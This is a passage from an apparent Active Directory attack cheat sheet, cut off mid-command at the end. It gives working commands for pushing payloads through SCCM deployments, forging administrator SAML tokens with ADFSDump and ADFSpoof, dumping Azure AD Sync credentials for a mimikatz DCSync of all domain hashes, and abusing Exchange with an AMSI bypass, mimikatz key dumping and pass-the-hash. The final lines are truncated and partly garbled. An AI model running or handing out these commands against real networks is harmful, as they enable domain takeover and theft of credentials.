Get-SCCMSession |Add-SccmDeviceToCollection -ComputerNameToAdd "Vuln_server1" -CollectionName "targets"
#Create a new application with any payload as our manual payload will execute eitherway.
Get-SCCMSession | New-SccmApplication -ApplicationName "shit" -Powershellunicodeb64 "Any_BASE64_Content"
#Create a Deployment and add it to our collection
Get-SCCMSession | New-SCCMApplicationDeployment -ApplicationName "shit" -AssignmentName "update" -CollectionName "targets"
#Force the clients to take the package
Get-SCCMSession |Invoke-SCCMDeviceCheckin -CollectionName "targets"
Exploiting ADFS_Server - Golden SAML Attack
#Suppose if you have adfs_server credentials - follow th below steps. Get ADFSDump from here
#Collect all the required info from ADFSDump - certs, tokens,endpoint details
copy the Encrypted Token Signing Key Begin, decode it from base64 as save it blob (example below)
Download the private key and decode it
└─$ cat key
D4YT5FD5GSFD51SFGFDH45DE4GES5GSDG5DS6GS65FD1GDFG
┌──[ADFSpoof]
└─$ cat key| xxd -r -p > key.bin
Download ADFSpoof and run it as below
#Generate SAML Authentication token, use the SAML token to the endpoint applicaiton.
python3 ADFSpoof.py -b blob key.bin -s adfs.steins.local saml2 --endpoint 'https://endpoint.steins.local/SamlResponseServlet' --nameidformat 'urn:oasis:names:tc:SAML:2.0:nameid-format:transient' --nameid '0x0security\administrator' --rpidentifier 'ME_2484c52-45g3-8541-df24-t543dsf18' --assertions '0x0security\administrator'
Exploiting Azure AD Sync Server
#Check if the service is turned on or not. if the serice is turned off, start it by following this Tutorial
#Use this script to dump msol hashes which has Domain replicate permissions - azuread_decrypt_msol_v2.ps1
#Copy the credentials, and using those creds - run DCSync on the domain controller
#login to the ADSync machine via RDP and copy mimikatz on the machine
# Shift+right click --> Run as another user --> use MSOL_2433243 creds
# Run below command to run dcsync attack, which dumps all hashes
lsadump::dcsync /domain:orbitfish.local /all /csv
Abusing Exchange Severs
#Abusing Exchange if you are part of Organizational Management group, fixed the bug in 2019 c2
#Organizational Management group, --> has access to exchange server --> exchange server is a member of Exchange Trustred Subsystems --> Exchange Trustred Subsystems is a member of Exchange Windows Permissions --> who can modify WriteDACL on all the root level domain objects. which leads to forest compromise.
#Login to exchange server --> bypass AMSI
#upload mimikatz to the target machine
Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $ExchangeServer
Enter-PSSession $ExchangeServer
#Download all the keys/creds from exchange server
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
#abusing exchange to gain DCSync
Invoke-Mimikatz -Command '"sekurlsaL:LInvoke
Invoke-Mimikatz -Command '"sekurlsa::pth /user:ExchangeServer$ domain:St
